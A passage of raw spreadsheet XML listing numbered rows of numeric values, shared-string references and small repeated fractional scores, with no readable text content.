        <v>20974.0</v>
      </c>
      <c r="B22178" s="2">
        <v>1.686155E7</v>
      </c>
      <c r="C22178" s="2" t="s">
        <v>21415</v>
      </c>
      <c r="D22178" s="2">
        <v>1.0</v>
      </c>
      <c r="E22178" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22178" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="22179" ht="15.75" customHeight="1">
      <c r="A22179" s="1">
        <v>25906.0</v>
      </c>
      <c r="B22179" s="2">
        <v>1.506872E7</v>
      </c>
      <c r="C22179" s="2" t="s">
        <v>21416</v>
      </c>
      <c r="D22179" s="2">
        <v>1.0</v>
      </c>
      <c r="E22179" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22179" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="22180" ht="15.75" customHeight="1">
      <c r="A22180" s="1">
        <v>73.0</v>
      </c>
      <c r="B22180" s="2">
        <v>1.1709823E7</v>
      </c>
      <c r="C22180" s="2" t="s">
        <v>21417</v>
      </c>
      <c r="D22180" s="2">
        <v>1.0</v>
      </c>
      <c r="E22180" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22180" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22181" ht="15.75" customHeight="1">
      <c r="A22181" s="1">
        <v>257.0</v>
      </c>
      <c r="B22181" s="2">
        <v>1.513858E7</v>
      </c>
      <c r="C22181" s="2" t="s">
        <v>21418</v>
      </c>
      <c r="D22181" s="2">
        <v>1.0</v>
      </c>
      <c r="E22181" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22181" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22182" ht="15.75" customHeight="1">
      <c r="A22182" s="1">
        <v>372.0</v>
      </c>
      <c r="B22182" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C22182" s="2" t="s">
        <v>21419</v>
      </c>
      <c r="D22182" s="2">
        <v>1.0</v>
      </c>
      <c r="E22182" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22182" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22183" ht="15.75" customHeight="1">
      <c r="A22183" s="1">
        <v>581.0</v>
      </c>
      <c r="B22183" s="2">
        <v>1.9134354E7</v>
      </c>
      <c r="C22183" s="2" t="s">
        <v>21420</v>
      </c>
      <c r="D22183" s="2">
        <v>1.0</v>
      </c>
      <c r="E22183" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22183" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22184" ht="15.75" customHeight="1">
      <c r="A22184" s="1">
        <v>596.0</v>
      </c>
      <c r="B22184" s="2">
        <v>1.9214374E7</v>
      </c>
      <c r="C22184" s="2" t="s">
        <v>21421</v>
      </c>
      <c r="D22184" s="2">
        <v>1.0</v>
      </c>
      <c r="E22184" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22184" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22185" ht="15.75" customHeight="1">
      <c r="A22185" s="1">
        <v>706.0</v>
      </c>
      <c r="B22185" s="2">
        <v>2.051942E7</v>
      </c>
      <c r="C22185" s="2" t="s">
        <v>21422</v>
      </c>
      <c r="D22185" s="2">
        <v>1.0</v>
      </c>
      <c r="E22185" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22185" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22186" ht="15.75" customHeight="1">
      <c r="A22186" s="1">
        <v>1399.0</v>
      </c>
      <c r="B22186" s="2">
        <v>2.6294738E7</v>
      </c>
      <c r="C22186" s="2" t="s">
        <v>21423</v>
      </c>
      <c r="D22186" s="2">
        <v>1.0</v>
      </c>
      <c r="E22186" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22186" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22187" ht="15.75" customHeight="1">
      <c r="A22187" s="1">
        <v>2118.0</v>
      </c>
      <c r="B22187" s="2">
        <v>3.1376222E7</v>
      </c>
      <c r="C22187" s="2" t="s">
        <v>21424</v>
      </c>
      <c r="D22187" s="2">
        <v>1.0</v>
      </c>
      <c r="E22187" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22187" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22188" ht="15.75" customHeight="1">
      <c r="A22188" s="1">
        <v>2357.0</v>
      </c>
      <c r="B22188" s="2">
        <v>3.3145533E7</v>
      </c>
      <c r="C22188" s="2" t="s">
        <v>21425</v>
      </c>
      <c r="D22188" s="2">
        <v>1.0</v>
      </c>
      <c r="E22188" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22188" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22189" ht="15.75" customHeight="1">
      <c r="A22189" s="1">
        <v>3886.0</v>
      </c>
      <c r="B22189" s="2">
        <v>4.0373185E7</v>
      </c>
      <c r="C22189" s="2" t="s">
        <v>21426</v>
      </c>
      <c r="D22189" s="2">
        <v>1.0</v>
      </c>
      <c r="E22189" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22189" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22190" ht="15.75" customHeight="1">
      <c r="A22190" s="1">
        <v>4447.0</v>
      </c>
      <c r="B22190" s="2">
        <v>4.2400687E7</v>
      </c>
      <c r="C22190" s="2" t="s">
        <v>21427</v>
      </c>
      <c r="D22190" s="2">
        <v>1.0</v>
      </c>
      <c r="E22190" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22190" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22191" ht="15.75" customHeight="1">
      <c r="A22191" s="1">
        <v>4501.0</v>
      </c>
      <c r="B22191" s="2">
        <v>4.257654E7</v>
      </c>
      <c r="C22191" s="2" t="s">
        <v>21428</v>
      </c>
      <c r="D22191" s="2">
        <v>1.0</v>
      </c>
      <c r="E22191" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22191" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22192" ht="15.75" customHeight="1">
      <c r="A22192" s="1">
        <v>4628.0</v>
      </c>
      <c r="B22192" s="2">
        <v>4.2983527E7</v>
      </c>
      <c r="C22192" s="2" t="s">
        <v>21429</v>
      </c>
      <c r="D22192" s="2">
        <v>1.0</v>
      </c>
      <c r="E22192" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22192" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22193" ht="15.75" customHeight="1">
      <c r="A22193" s="1">
        <v>4731.0</v>
      </c>
      <c r="B22193" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C22193" s="2" t="s">
        <v>21430</v>
      </c>
      <c r="D22193" s="2">
        <v>1.0</v>
      </c>
      <c r="E22193" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22193" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22194" ht="15.75" customHeight="1">
      <c r="A22194" s="1">
        <v>5692.0</v>
      </c>
      <c r="B22194" s="2">
        <v>4.6455204E7</v>
      </c>
      <c r="C22194" s="2" t="s">
        <v>21431</v>
      </c>
      <c r="D22194" s="2">
        <v>1.0</v>
      </c>
      <c r="E22194" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22194" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22195" ht="15.75" customHeight="1">
      <c r="A22195" s="1">
        <v>6528.0</v>
      </c>
      <c r="B22195" s="2">
        <v>4.8828084E7</v>
      </c>
      <c r="C22195" s="2" t="s">
        <v>21432</v>
      </c>
      <c r="D22195" s="2">
        <v>1.0</v>
      </c>
      <c r="E22195" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22195" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22196" ht="15.75" customHeight="1">
      <c r="A22196" s="1">
        <v>6529.0</v>
      </c>
      <c r="B22196" s="2">
        <v>4.8828084E7</v>
      </c>
      <c r="C22196" s="2" t="s">
        <v>21433</v>
      </c>
      <c r="D22196" s="2">
        <v>1.0</v>
      </c>
      <c r="E22196" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22196" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22197" ht="15.75" customHeight="1">
      <c r="A22197" s="1">
        <v>6676.0</v>
      </c>
      <c r="B22197" s="2">
        <v>4.916561E7</v>
      </c>
      <c r="C22197" s="2" t="s">
        <v>21434</v>
      </c>
      <c r="D22197" s="2">
        <v>1.0</v>
      </c>
      <c r="E22197" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22197" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22198" ht="15.75" customHeight="1">
      <c r="A22198" s="1">
        <v>6938.0</v>
      </c>
      <c r="B22198" s="2">
        <v>4.9911512E7</v>
      </c>
      <c r="C22198" s="2" t="s">
        <v>21435</v>
      </c>
      <c r="D22198" s="2">
        <v>1.0</v>
      </c>
      <c r="E22198" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22198" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22199" ht="15.75" customHeight="1">
      <c r="A22199" s="1">
        <v>8024.0</v>
      </c>
      <c r="B22199" s="2">
        <v>5.2805339E7</v>
      </c>
      <c r="C22199" s="2" t="s">
        <v>21436</v>
      </c>
      <c r="D22199" s="2">
        <v>1.0</v>
      </c>
      <c r="E22199" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22199" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22200" ht="15.75" customHeight="1">
      <c r="A22200" s="1">
        <v>8180.0</v>
      </c>
      <c r="B22200" s="2">
        <v>5.3242791E7</v>
      </c>
      <c r="C22200" s="2" t="s">
        <v>21437</v>
      </c>
      <c r="D22200" s="2">
        <v>1.0</v>
      </c>
      <c r="E22200" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22200" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22201" ht="15.75" customHeight="1">
      <c r="A22201" s="1">
        <v>8220.0</v>
      </c>
      <c r="B22201" s="2">
        <v>5.3334292E7</v>
      </c>
      <c r="C22201" s="2" t="s">
        <v>21438</v>
      </c>
      <c r="D22201" s="2">
        <v>1.0</v>
      </c>
      <c r="E22201" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22201" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22202" ht="15.75" customHeight="1">
      <c r="A22202" s="1">
        <v>8866.0</v>
      </c>
      <c r="B22202" s="2">
        <v>5.4745576E7</v>
      </c>
      <c r="C22202" s="2" t="s">
        <v>21439</v>
      </c>
      <c r="D22202" s="2">
        <v>1.0</v>
      </c>
      <c r="E22202" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22202" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22203" ht="15.75" customHeight="1">
      <c r="A22203" s="1">
        <v>9320.0</v>
      </c>
      <c r="B22203" s="2">
        <v>5.558073E7</v>
      </c>
      <c r="C22203" s="2" t="s">
        <v>21440</v>
      </c>
      <c r="D22203" s="2">
        <v>1.0</v>
      </c>
      <c r="E22203" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22203" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22204" ht="15.75" customHeight="1">
      <c r="A22204" s="1">
        <v>9690.0</v>
      </c>
      <c r="B22204" s="2">
        <v>5.6351889E7</v>
      </c>
      <c r="C22204" s="2" t="s">
        <v>21441</v>
      </c>
      <c r="D22204" s="2">
        <v>1.0</v>
      </c>
      <c r="E22204" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22204" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22205" ht="15.75" customHeight="1">
      <c r="A22205" s="1">
        <v>9755.0</v>
      </c>
      <c r="B22205" s="2">
        <v>5.6491005E7</v>
      </c>
      <c r="C22205" s="2" t="s">
        <v>21442</v>
      </c>
      <c r="D22205" s="2">
        <v>1.0</v>
      </c>
      <c r="E22205" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22205" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22206" ht="15.75" customHeight="1">
      <c r="A22206" s="1">
        <v>9802.0</v>
      </c>
      <c r="B22206" s="2">
        <v>5.6564654E7</v>
      </c>
      <c r="C22206" s="2" t="s">
        <v>21443</v>
      </c>
      <c r="D22206" s="2">
        <v>1.0</v>
      </c>
      <c r="E22206" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22206" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22207" ht="15.75" customHeight="1">
      <c r="A22207" s="1">
        <v>10822.0</v>
      </c>
      <c r="B22207" s="2">
        <v>1.5886947E7</v>
      </c>
      <c r="C22207" s="2" t="s">
        <v>21444</v>
      </c>
      <c r="D22207" s="2">
        <v>1.0</v>
      </c>
      <c r="E22207" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22207" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22208" ht="15.75" customHeight="1">
      <c r="A22208" s="1">
        <v>12172.0</v>
      </c>
      <c r="B22208" s="2">
        <v>2.7443813E7</v>
      </c>
      <c r="C22208" s="2" t="s">
        <v>21445</v>
      </c>
      <c r="D22208" s="2">
        <v>1.0</v>
      </c>
      <c r="E22208" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22208" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22209" ht="15.75" customHeight="1">
      <c r="A22209" s="1">
        <v>12310.0</v>
      </c>
      <c r="B22209" s="2">
        <v>2.8395556E7</v>
      </c>
      <c r="C22209" s="2" t="s">
        <v>21446</v>
      </c>
      <c r="D22209" s="2">
        <v>1.0</v>
      </c>
      <c r="E22209" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22209" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22210" ht="15.75" customHeight="1">
      <c r="A22210" s="1">
        <v>12915.0</v>
      </c>
      <c r="B22210" s="2">
        <v>3.2201807E7</v>
      </c>
      <c r="C22210" s="2" t="s">
        <v>21447</v>
      </c>
      <c r="D22210" s="2">
        <v>1.0</v>
      </c>
      <c r="E22210" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22210" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22211" ht="15.75" customHeight="1">
      <c r="A22211" s="1">
        <v>13638.0</v>
      </c>
      <c r="B22211" s="2">
        <v>3.5911928E7</v>
      </c>
      <c r="C22211" s="2" t="s">
        <v>21448</v>
      </c>
      <c r="D22211" s="2">
        <v>1.0</v>
      </c>
      <c r="E22211" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22211" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22212" ht="15.75" customHeight="1">
      <c r="A22212" s="1">
        <v>13969.0</v>
      </c>
      <c r="B22212" s="2">
        <v>3.731639E7</v>
      </c>
      <c r="C22212" s="2" t="s">
        <v>21449</v>
      </c>
      <c r="D22212" s="2">
        <v>1.0</v>
      </c>
      <c r="E22212" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22212" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22213" ht="15.75" customHeight="1">
      <c r="A22213" s="1">
        <v>14013.0</v>
      </c>
      <c r="B22213" s="2">
        <v>3.7459999E7</v>
      </c>
      <c r="C22213" s="2" t="s">
        <v>21450</v>
      </c>
      <c r="D22213" s="2">
        <v>1.0</v>
      </c>
      <c r="E22213" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22213" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22214" ht="15.75" customHeight="1">
      <c r="A22214" s="1">
        <v>15383.0</v>
      </c>
      <c r="B22214" s="2">
        <v>4.2776495E7</v>
      </c>
      <c r="C22214" s="2" t="s">
        <v>21451</v>
      </c>
      <c r="D22214" s="2">
        <v>1.0</v>
      </c>
      <c r="E22214" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22214" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22215" ht="15.75" customHeight="1">
      <c r="A22215" s="1">
        <v>15459.0</v>
      </c>
      <c r="B22215" s="2">
        <v>4.3081153E7</v>
      </c>
      <c r="C22215" s="2" t="s">
        <v>21452</v>
      </c>
      <c r="D22215" s="2">
        <v>1.0</v>
      </c>
      <c r="E22215" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22215" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22216" ht="15.75" customHeight="1">
      <c r="A22216" s="1">
        <v>15700.0</v>
      </c>
      <c r="B22216" s="2">
        <v>4.3924728E7</v>
      </c>
      <c r="C22216" s="2" t="s">
        <v>21453</v>
      </c>
      <c r="D22216" s="2">
        <v>1.0</v>
      </c>
      <c r="E22216" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22216" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22217" ht="15.75" customHeight="1">
      <c r="A22217" s="1">
        <v>16178.0</v>
      </c>
      <c r="B22217" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C22217" s="2" t="s">
        <v>21454</v>
      </c>
      <c r="D22217" s="2">
        <v>1.0</v>
      </c>
      <c r="E22217" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22217" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22218" ht="15.75" customHeight="1">
      <c r="A22218" s="1">
        <v>16558.0</v>
      </c>
      <c r="B22218" s="2">
        <v>4.6839225E7</v>
      </c>
      <c r="C22218" s="2" t="s">
        <v>21455</v>
      </c>
      <c r="D22218" s="2">
        <v>1.0</v>
      </c>
      <c r="E22218" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22218" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22219" ht="15.75" customHeight="1">
      <c r="A22219" s="1">
        <v>16884.0</v>
      </c>
      <c r="B22219" s="2">
        <v>4.8012986E7</v>
      </c>
      <c r="C22219" s="2" t="s">
        <v>21456</v>
      </c>
      <c r="D22219" s="2">
        <v>1.0</v>
      </c>
      <c r="E22219" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22219" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22220" ht="15.75" customHeight="1">
      <c r="A22220" s="1">
        <v>17257.0</v>
      </c>
      <c r="B22220" s="2">
        <v>4.9136976E7</v>
      </c>
      <c r="C22220" s="2" t="s">
        <v>21457</v>
      </c>
      <c r="D22220" s="2">
        <v>1.0</v>
      </c>
      <c r="E22220" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22220" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22221" ht="15.75" customHeight="1">
      <c r="A22221" s="1">
        <v>17706.0</v>
      </c>
      <c r="B22221" s="2">
        <v>5.0595427E7</v>
      </c>
      <c r="C22221" s="2" t="s">
        <v>21458</v>
      </c>
      <c r="D22221" s="2">
        <v>1.0</v>
      </c>
      <c r="E22221" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22221" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22222" ht="15.75" customHeight="1">
      <c r="A22222" s="1">
        <v>18058.0</v>
      </c>
      <c r="B22222" s="2">
        <v>5.1588503E7</v>
      </c>
      <c r="C22222" s="2" t="s">
        <v>21459</v>
      </c>
      <c r="D22222" s="2">
        <v>1.0</v>
      </c>
      <c r="E22222" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22222" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22223" ht="15.75" customHeight="1">
      <c r="A22223" s="1">
        <v>19142.0</v>
      </c>
      <c r="B22223" s="2">
        <v>5.4834409E7</v>
      </c>
      <c r="C22223" s="2" t="s">
        <v>21460</v>
      </c>
      <c r="D22223" s="2">
        <v>1.0</v>
      </c>
      <c r="E22223" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22223" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22224" ht="15.75" customHeight="1">
      <c r="A22224" s="1">
        <v>19348.0</v>
      </c>
      <c r="B22224" s="2">
        <v>5.5386386E7</v>
      </c>
      <c r="C22224" s="2" t="s">
        <v>21461</v>
      </c>
      <c r="D22224" s="2">
        <v>1.0</v>
      </c>
      <c r="E22224" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22224" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22225" ht="15.75" customHeight="1">
      <c r="A22225" s="1">
        <v>20360.0</v>
      </c>
      <c r="B22225" s="2">
        <v>1.1717131E7</v>
      </c>
      <c r="C22225" s="2" t="s">
        <v>21462</v>
      </c>
      <c r="D22225" s="2">
        <v>1.0</v>
      </c>
      <c r="E22225" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22225" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22226" ht="15.75" customHeight="1">
      <c r="A22226" s="1">
        <v>20444.0</v>
      </c>
      <c r="B22226" s="2">
        <v>1.2420854E7</v>
      </c>
      <c r="C22226" s="2" t="s">
        <v>21463</v>
      </c>
      <c r="D22226" s="2">
        <v>1.0</v>
      </c>
      <c r="E22226" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22226" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22227" ht="15.75" customHeight="1">
      <c r="A22227" s="1">
        <v>21379.0</v>
      </c>
      <c r="B22227" s="2">
        <v>2.166319E7</v>
      </c>
      <c r="C22227" s="2" t="s">
        <v>21464</v>
      </c>
      <c r="D22227" s="2">
        <v>1.0</v>
      </c>
      <c r="E22227" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22227" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22228" ht="15.75" customHeight="1">
      <c r="A22228" s="1">
        <v>22738.0</v>
      </c>
      <c r="B22228" s="2">
        <v>4.4087445E7</v>
      </c>
      <c r="C22228" s="2" t="s">
        <v>21465</v>
      </c>
      <c r="D22228" s="2">
        <v>1.0</v>
      </c>
      <c r="E22228" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22228" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22229" ht="15.75" customHeight="1">
      <c r="A22229" s="1">
        <v>24497.0</v>
      </c>
      <c r="B22229" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C22229" s="2" t="s">
        <v>21466</v>
      </c>
      <c r="D22229" s="2">
        <v>1.0</v>
      </c>
      <c r="E22229" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22229" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22230" ht="15.75" customHeight="1">
      <c r="A22230" s="1">
        <v>25483.0</v>
      </c>
      <c r="B22230" s="2">
        <v>1.4028153E7</v>
      </c>
      <c r="C22230" s="2" t="s">
        <v>21467</v>
      </c>
      <c r="D22230" s="2">
        <v>1.0</v>
      </c>
      <c r="E22230" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22230" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22231" ht="15.75" customHeight="1">
      <c r="A22231" s="1">
        <v>25518.0</v>
      </c>
      <c r="B22231" s="2">
        <v>1.4192391E7</v>
      </c>
      <c r="C22231" s="2" t="s">
        <v>21468</v>
      </c>
      <c r="D22231" s="2">
        <v>1.0</v>
      </c>
      <c r="E22231" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22231" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22232" ht="15.75" customHeight="1">
      <c r="A22232" s="1">
        <v>26106.0</v>
      </c>
      <c r="B22232" s="2">
        <v>1.5775128E7</v>
      </c>
      <c r="C22232" s="2" t="s">
        <v>21469</v>
      </c>
      <c r="D22232" s="2">
        <v>1.0</v>
      </c>
      <c r="E22232" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22232" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22233" ht="15.75" customHeight="1">
      <c r="A22233" s="1">
        <v>26830.0</v>
      </c>
      <c r="B22233" s="2">
        <v>1.887027E7</v>
      </c>
      <c r="C22233" s="2" t="s">
        <v>21470</v>
      </c>
      <c r="D22233" s="2">
        <v>1.0</v>
      </c>
      <c r="E22233" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22233" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22234" ht="15.75" customHeight="1">
      <c r="A22234" s="1">
        <v>29081.0</v>
      </c>
      <c r="B22234" s="2">
        <v>3.0339006E7</v>
      </c>
      <c r="C22234" s="2" t="s">
        <v>21471</v>
      </c>
      <c r="D22234" s="2">
        <v>1.0</v>
      </c>
      <c r="E22234" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22234" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22235" ht="15.75" customHeight="1">
      <c r="A22235" s="1">
        <v>29890.0</v>
      </c>
      <c r="B22235" s="2">
        <v>3607013.0</v>
      </c>
      <c r="C22235" s="2" t="s">
        <v>21472</v>
      </c>
      <c r="D22235" s="2">
        <v>1.0</v>
      </c>
      <c r="E22235" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22235" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22236" ht="15.75" customHeight="1">
      <c r="A22236" s="1">
        <v>29971.0</v>
      </c>
      <c r="B22236" s="2">
        <v>3609250.0</v>
      </c>
      <c r="C22236" s="2" t="s">
        <v>21473</v>
      </c>
      <c r="D22236" s="2">
        <v>1.0</v>
      </c>
      <c r="E22236" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22236" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22237" ht="15.75" customHeight="1">
      <c r="A22237" s="1">
        <v>33434.0</v>
      </c>
      <c r="B22237" s="2">
        <v>7810382.0</v>
      </c>
      <c r="C22237" s="2" t="s">
        <v>21474</v>
      </c>
      <c r="D22237" s="2">
        <v>1.0</v>
      </c>
      <c r="E22237" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22237" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="22238" ht="15.75" customHeight="1">
      <c r="A22238" s="1">
        <v>2.0</v>
      </c>
      <c r="B22238" s="2">
        <v>1.0047445E7</v>
      </c>
      <c r="C22238" s="2" t="s">
        <v>21475</v>
      </c>
      <c r="D22238" s="2">
        <v>1.0</v>
      </c>
      <c r="E22238" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22238" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22239" ht="15.75" customHeight="1">
      <c r="A22239" s="1">
        <v>72.0</v>
      </c>
      <c r="B22239" s="2">
        <v>1.1671723E7</v>
      </c>
      <c r="C22239" s="2" t="s">
        <v>21476</v>
      </c>
      <c r="D22239" s="2">
        <v>1.0</v>
      </c>
      <c r="E22239" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22239" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22240" ht="15.75" customHeight="1">
      <c r="A22240" s="1">
        <v>115.0</v>
      </c>
      <c r="B22240" s="2">
        <v>1.2975575E7</v>
      </c>
      <c r="C22240" s="2" t="s">
        <v>21477</v>
      </c>
      <c r="D22240" s="2">
        <v>1.0</v>
      </c>
      <c r="E22240" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22240" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22241" ht="15.75" customHeight="1">
      <c r="A22241" s="1">
        <v>149.0</v>
      </c>
      <c r="B22241" s="2">
        <v>1.3639825E7</v>
      </c>
      <c r="C22241" s="2" t="s">
        <v>21478</v>
      </c>
      <c r="D22241" s="2">
        <v>1.0</v>
      </c>
      <c r="E22241" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22241" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22242" ht="15.75" customHeight="1">
      <c r="A22242" s="1">
        <v>160.0</v>
      </c>
      <c r="B22242" s="2">
        <v>1.3750599E7</v>
      </c>
      <c r="C22242" s="2" t="s">
        <v>21479</v>
      </c>
      <c r="D22242" s="2">
        <v>1.0</v>
      </c>
      <c r="E22242" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22242" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22243" ht="15.75" customHeight="1">
      <c r="A22243" s="1">
        <v>161.0</v>
      </c>
      <c r="B22243" s="2">
        <v>1.3755885E7</v>
      </c>
      <c r="C22243" s="2" t="s">
        <v>21480</v>
      </c>
      <c r="D22243" s="2">
        <v>1.0</v>
      </c>
      <c r="E22243" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22243" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22244" ht="15.75" customHeight="1">
      <c r="A22244" s="1">
        <v>183.0</v>
      </c>
      <c r="B22244" s="2">
        <v>1.4237597E7</v>
      </c>
      <c r="C22244" s="2" t="s">
        <v>21481</v>
      </c>
      <c r="D22244" s="2">
        <v>1.0</v>
      </c>
      <c r="E22244" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22244" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22245" ht="15.75" customHeight="1">
      <c r="A22245" s="1">
        <v>287.0</v>
      </c>
